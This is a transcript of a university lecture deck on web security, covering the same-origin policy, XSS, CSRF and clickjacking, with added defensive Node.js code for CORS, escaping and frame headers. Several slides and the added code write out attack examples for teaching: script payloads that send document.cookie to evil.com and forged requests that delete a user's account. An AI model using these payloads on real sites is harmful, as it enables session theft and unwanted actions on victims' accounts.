
Selected Topics on Website Security @ 102-2 CCSP


Concept of Same Origin Policy, XSS, CSRF & Clickjacking


Johnson Liang

May 29, 2014

Transcript

  1. Selected Topics on Website Security: Concept of Same Origin Policy,
    XSS, CSRF & Clickjacking. MrOrz, 102-2 CCSP. Reference: 白帽子講 Web 安全 (吳翰清)
  2. (Same title slide, Chinese version.)
  3. Same-Origin Policy

  4. "The same-origin policy is the browser's most central and most basic security feature... the Web is built on the foundation of the same-origin policy." – 吳翰清

  5. Same Origin vs. Different Origin. Every browser: allows a page to look at
    things from its own origin, and refuses to let it look at things from a different origin.
  6. Same Origin vs. Different Origin. If there were no same-origin policy:
  7. Same Origin vs. Different Origin. If there were no same-origin policy, then upon
    visiting http://evil.mobile.org any page could run:
    $.get('http://facebook.com', {}, function(data){ /* your Facebook wall, obtained without your permission */ }, 'html');
  8. Whether two URLs are the same origin is decided by host, port & protocol.
    https://developer.mozilla.org/zh-TW/docs/JavaScript/Same_origin_policy_for_JavaScript

  9. By default, reading data across domains is refused; the following are the exceptions.

  10. Exception 1: tags that may load resources cross-domain: <script>, <img>, <iframe>, <link>.
    The browser fetches and renders them, but JavaScript on the page still has no way to read or write their contents (a cross-origin <iframe>'s DOM, an <img>'s pixels once drawn to a canvas).
  11. Exception 2: Cross-Origin Resource Sharing (CORS). The browser adds an Origin request header; the target server opts in with Access-Control-Allow-XXX response headers. Enables cross-origin AJAX, web fonts, WebGL & canvas.
    For simple requests the request is sent either way; CORS only decides whether the page may read the response.
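The origin comparison behind slides 5 to 11, and the server side of CORS, as an added example in Node.js (editor's code, not from the slides). The allow-list, the option names and the request values are constructed for the demo.

```javascript
// An origin is scheme + host + port. URL.origin serialises exactly that and
// omits a default port, so http://a.example:80 and http://a.example compare
// equal, as they do in browsers. An unparsable value (for instance the literal
// "null" that a sandboxed iframe sends) throws; callers treat that as "no origin".
function originOf(url) {
  return new URL(url).origin;
}

function sameOrigin(a, b) {
  return originOf(a) === originOf(b);
}

// Constructed allow-list for the demo (assumed deployment, not a real site).
const ALLOWED_ORIGINS = ['https://app.example', 'https://admin.app.example:8443'];

// Decide the CORS headers for a request carrying an Origin header.
// Returns null when the origin is not allowed: the browser then refuses to
// hand the response to the calling page, which is the same-origin default
// (the response is still fetched; only readability is withheld).
// Two details that matter in practice:
//  - the allowed value is echoed back verbatim (browsers compare it
//    byte-for-byte with the Origin they sent), never rebuilt or set to "*";
//  - "Vary: Origin" keeps a shared cache from serving one origin's
//    Access-Control-Allow-Origin to another.
// Reflecting every Origin together with Allow-Credentials: true would
// re-create the slide-7 scenario for any site that wants your users' data.
function corsHeaders(originHeader, allowList, opts) {
  opts = opts || {};
  if (!originHeader) return null;
  let requester;
  try {
    requester = originOf(originHeader);
  } catch (e) {
    return null;
  }
  const allowed = allowList.some(function (o) { return originOf(o) === requester; });
  if (!allowed) return null;
  const headers = {
    'Access-Control-Allow-Origin': originHeader,
    'Vary': 'Origin',
  };
  if (opts.credentials) headers['Access-Control-Allow-Credentials'] = 'true';
  if (opts.preflight) {
    // Answer to an OPTIONS preflight: which methods and request headers the
    // page may use. Constructed defaults; a real API lists what it accepts.
    headers['Access-Control-Allow-Methods'] = (opts.methods || ['GET', 'POST']).join(', ');
    headers['Access-Control-Allow-Headers'] = (opts.requestHeaders || ['Content-Type']).join(', ');
    headers['Access-Control-Max-Age'] = '600';
  }
  return headers;
}
```

A request from http://evil.mobile.org gets null and therefore no Access-Control-Allow-Origin at all, which is exactly the behaviour slide 7 relies on.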
  12. Cross-Site Scripting (XSS)

  13. "XSS refers to an attack in which a hacker tampers with a web page through 'HTML injection', inserting malicious script, and thereby controls the user's browser when the user views the page." – 吳翰清

  14. Your site, Example #1: <section class="intro"> <%- user.desc %> </section>
    user.desc is HTML entered by the user, and <%- %> outputs it unescaped.
  15. Your site, Example #1, rendered for a harmless user: <section class="intro"> <p>Hello</p> <p>I am Johnson</p> </section>
  16. Your site, Example #1, rendered for a malicious user: <section class="intro"> <script type="text/javascript"> $.getJSON('http://evil.com/', { stoken: document.cookie }); </script> </section>
    Anyone who visits this user's page has their cookie sent to evil.com. The same-origin policy does not help: the request is still sent, cookie in the query string, even though the page cannot read evil.com's reply.
  17. Your site, Example #2: <script type="text/javascript"> var pageTitle = "<%= userPage.title %>"; </script>
    userPage.title is a string freely entered by the user, and <%= %> only applies HTML escaping, which is the wrong encoding for a JavaScript string literal.
  18. Your site, Example #2, with a title that closes the string: <script type="text/javascript"> var pageTitle = ""; $.getJSON(...); ""; </script>
    Anyone who visits this user's page has their data sent away.
  19. Your site, Example #3: $.getJSON('http://yoursite.com/page/'+pageId, {}, function(data){ $('h1').html(data.userPageTitle); });
    userPageTitle is a string freely entered by the user; rendered: <h1>Welcome to my page!</h1>
  20. Your site, Example #3, with a malicious title: <h1>Welcome to my page!<script>$.getJSON('http://evil.com',...);</script></h1>
    The title never went through a server-side template; jQuery's .html() parses the string as markup and executes the <script> it contains. This is DOM-based XSS.
  21. "The original demonstration cases of this attack were cross-domain, hence the name 'Cross' Site Scripting. Today, whether it crosses domains no longer matters, yet the name XSS has stuck." – 吳翰清

  22. Defences. Preventing cookie theft: HttpOnly.
    res.cookie('key', 'value', { httpOnly: true });
    For the Express session cookie the default is already httpOnly: true; cookies you set yourself with res.cookie need it explicitly. HttpOnly only hides the cookie from document.cookie; injected script can still make requests as the user, so it limits the damage rather than stopping XSS.
  24. Defences. HTML output escaping: avoid <%- %> wherever you can.
    <section class="intro"> <%= user.desc %> </section>
  25. Defences. HTML output filtering with Caja-HTML-Sanitizer, which keeps harmless HTML tags:
    // Controller
    var sanitizer = require('sanitizer');
    sanitizedIntro = sanitizer.sanitize(user.desc);
    <!-- View -->
    <section class="intro"> <%- sanitizedIntro %> </section>
  26. Defences. JavaScript output escaping: use the built-in JSON.stringify.
    <script type="text/javascript"> var page = <%- JSON.stringify({ title: userPage.title }) %>; </script>
    The unescaped <%- %> is deliberate here: the JSON must not be HTML-escaped. JSON.stringify alone, however, leaves "<" untouched, so a title containing "</script>" still ends the script block; escape "<" as \u003c in the output as well.
  27. Defences. DOM-based XSS: prefer .text(...) over .html(...), or sanitize the HTML you want to insert first.
    $.getJSON('http://yoursite.com/page/'+pageId, {}, function(data){ $('h1').text(data.userPageTitle); });
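Slides 24 to 27 hand one rule to each output context. The following is an added Node.js example (editor's code, not from the slides or from EJS) that implements those rules as plain functions and runs the attacker inputs from slides 16 and 18 through them; the function names and the two payload strings are constructed for the demo.

```javascript
// HTML text / attribute context: what EJS <%= %> does for user.desc.
// All five characters matter; '&' goes first so earlier escapes are not re-escaped.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Inline <script> context: JSON.stringify yields a valid JS literal for any
// value, but leaves '<' alone, so a title containing "</script>" still ends the
// script block. Escaping '<' and '>' (and the two line terminators that JSON
// permits raw but JS string literals do not) closes that gap. The output is
// still valid JSON, so JSON.parse on the other side reads it unchanged.
function jsLiteral(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Example #1 hardened: the description lands in an HTML context.
function renderIntro(desc) {
  return '<section class="intro">' + escapeHtml(desc) + '</section>';
}

// Example #2 hardened: the title lands in a JavaScript context.
function renderTitleScript(title) {
  return '<script type="text/javascript">var page = ' +
    jsLiteral({ title: title }) + ';</script>';
}

// What slide 26 emits with JSON.stringify alone: the attacker's </script>
// survives and closes the block early.
function naiveTitleScript(title) {
  return '<script type="text/javascript">var page = ' +
    JSON.stringify({ title: title }) + ';</script>';
}

// Constructed attacker inputs, modelled on slides 16 and 18.
const EVIL_DESC =
  '<script>$.getJSON("http://evil.com/", { stoken: document.cookie });</script>';
const EVIL_TITLE =
  '</script><script>$.getJSON("http://evil.com/", { stoken: document.cookie })</script>';

// Run the three renderers over the payloads and return the markup they produce.
function demo() {
  return {
    intro: renderIntro(EVIL_DESC),
    naive: naiveTitleScript(EVIL_TITLE),
    hardened: renderTitleScript(EVIL_TITLE),
  };
}
```

Printing demo() shows the first two renders as a browser would parse them: the hardened title script contains a single `</script>`, its own, while the naive one contains the attacker's as well. For the DOM case on slide 27 the browser does the equivalent of escapeHtml for you when you call .text().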
  28. Cross-Site Request Forgery (CSRF/XSRF)

  29. Your site, Example #4: // Delete current user account
    app.get('/user/delete', userCtrl.delete);
    A state-changing action behind a GET request: any fetch of that URL triggers it.
  30. evil.com, Example #4: <img src="http://yoursite.com/user/delete">
    Anyone who visits this evil site has their account on yoursite.com inexplicably deleted: the browser attached the yoursite.com cookies to the image request.

  31. "Merely by luring the user to visit a page, the attacker has performed an operation on yoursite.com under that user's identity... Because this request is forged by the attacker, it is called 'Cross-site Request Forgery'." – 吳翰清

  32. <iframe src="https://mail.google.com/mail/u/0/?logout"> Demo: cryptogasm.com/gmail-logout.html
    The same trick with an <iframe>: a page that embeds Gmail's logout URL logs its visitors out of Gmail.

  33. evil.com, Example #5: <form action="http://yoursite.com/user/delete" method="post" id="evil-form"> </form>
    <script type="text/javascript"> $('#evil-form').submit(); </script>
    After visiting the evil site, the user's account on yoursite.com is inexplicably deleted. Moving the endpoint to POST is no defence by itself: the browser attaches the cookies to a cross-site form submission just as it does to a GET.
  34. Defences. What a successful CSRF attack needs: every parameter of the request can be guessed by the attacker (the session cookie is added by the browser for free). Anti-CSRF token: a value the attacker cannot guess, so the attacker cannot assemble a correct request.
  35. Defences
  36. Defences
  37. Defences. After the form is submitted, the backend controller checks whether the token in the form matches the token kept for the user's session; if they differ, it does nothing.

  38. Defences. http://stackoverflow.com/questions/20420762/how-to-enable-csrf-in-express3
    // Express settings
    app.use(express.cookieParser('optional secret string'));
    app.use(express.session());
    app.use(express.csrf());
    app.use(function (req, res, next) {
      res.locals.csrftoken = req.csrfToken(); // expose the session's anti-CSRF token to the view
      next();
    });
    <!-- View -->
    <form action="..." method="post">
      <input type="hidden" name="_csrf" value="<%= csrftoken %>">
    </form>
    Order matters: express.csrf() needs the session middleware before it, since the secret it checks tokens against lives in the session.
  39. Clickjacking

  40. Jeremiah Grossman and Robert Hansen, 2008

  41. http://www.crazylearner.org/clickjacking-example/ Copyright 2014 Crazylearner. Fair use

  42. (image-only slide)
  43. Defences: keep your site from being stuffed into an <iframe>.
    x-frame-options: deny
    https://github.com/evilpacket/helmet (screenshot caption: "Can't be your site!")
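A checker for the header on slide 43, as an added Node.js example (editor's code, not from the slides or from helmet): given the response headers of a page at pageOrigin, it answers whether a page at framerOrigin could frame it, the way current browsers decide. It covers X-Frame-Options DENY and SAMEORIGIN and the common frame-ancestors source forms ('none', 'self', *, scheme:, host with an optional *. prefix and port); the header sets at the bottom are constructed.

```javascript
// Return the frame-ancestors source list from a CSP value, or null if absent.
function frameAncestorsOf(csp) {
  for (const part of csp.split(';')) {
    const tokens = part.trim().split(/\s+/);
    if (tokens[0] && tokens[0].toLowerCase() === 'frame-ancestors') return tokens.slice(1);
  }
  return null;
}

// Does any source expression admit framerOrigin as an ancestor of pageOrigin?
function ancestorAllowed(sources, framerOrigin, pageOrigin) {
  const framer = new URL(framerOrigin);
  const framerPort = framer.port || (framer.protocol === 'https:' ? '443' : '80');
  for (const raw of sources) {
    const src = raw.toLowerCase();
    if (src === "'none'") return false;
    if (src === '*') return true;
    if (src === "'self'") {
      if (framer.origin === new URL(pageOrigin).origin) return true;
      continue;
    }
    if (/^[a-z][a-z0-9+.-]*:$/.test(src)) {            // scheme-source, e.g. https:
      if (framer.protocol === src) return true;
      continue;
    }
    // host-source: [scheme://][*.]host[:port|:*]
    const m = src.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:\/]+)(?::(\d+|\*))?$/);
    if (!m) continue;
    const scheme = m[1], wildcard = m[2], host = m[3], port = m[4];
    if (scheme && scheme + ':' !== framer.protocol) continue;
    const hostOk = wildcard ? framer.hostname.endsWith('.' + host) : framer.hostname === host;
    if (!hostOk) continue;
    // No port in the source means the default port; URL.port is '' in that case.
    if (port === undefined) {
      if (framer.port !== '') continue;
    } else if (port !== '*' && port !== framerPort) {
      continue;
    }
    return true;
  }
  return false;
}

function canBeFramed(headers, framerOrigin, pageOrigin) {
  const h = {};
  for (const k of Object.keys(headers)) h[k.toLowerCase()] = headers[k];
  // When both headers are present, frame-ancestors takes precedence.
  if (h['content-security-policy']) {
    const sources = frameAncestorsOf(h['content-security-policy']);
    if (sources) return ancestorAllowed(sources, framerOrigin, pageOrigin);
  }
  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return new URL(framerOrigin).origin === new URL(pageOrigin).origin;
  // Anything else, including no header at all or the retired ALLOW-FROM form,
  // is ignored by current browsers, so the page is framable (the slide-41 case).
  return true;
}

// Constructed header sets: the unprotected demo page, the slide's deny setting,
// and a CSP policy that admits the site itself and one partner.
const NO_PROTECTION = { 'Content-Type': 'text/html' };
const SLIDE_DENY = { 'X-Frame-Options': 'DENY' };
const CSP_PARTNER = { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'self' https://partner.example" };
```

Run it over a captured response during a review: a true result for an attacker-controlled framerOrigin is the clickjacking precondition. Note that DENY refuses even the site's own frames, which is what the slide's setting asks for; frame-ancestors is the way to allow a named partner without reopening the hole.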
  44. http://youtu.be/VRCUpXLguHM (the reference book 白帽子講 Web 安全 is written by 吳翰清)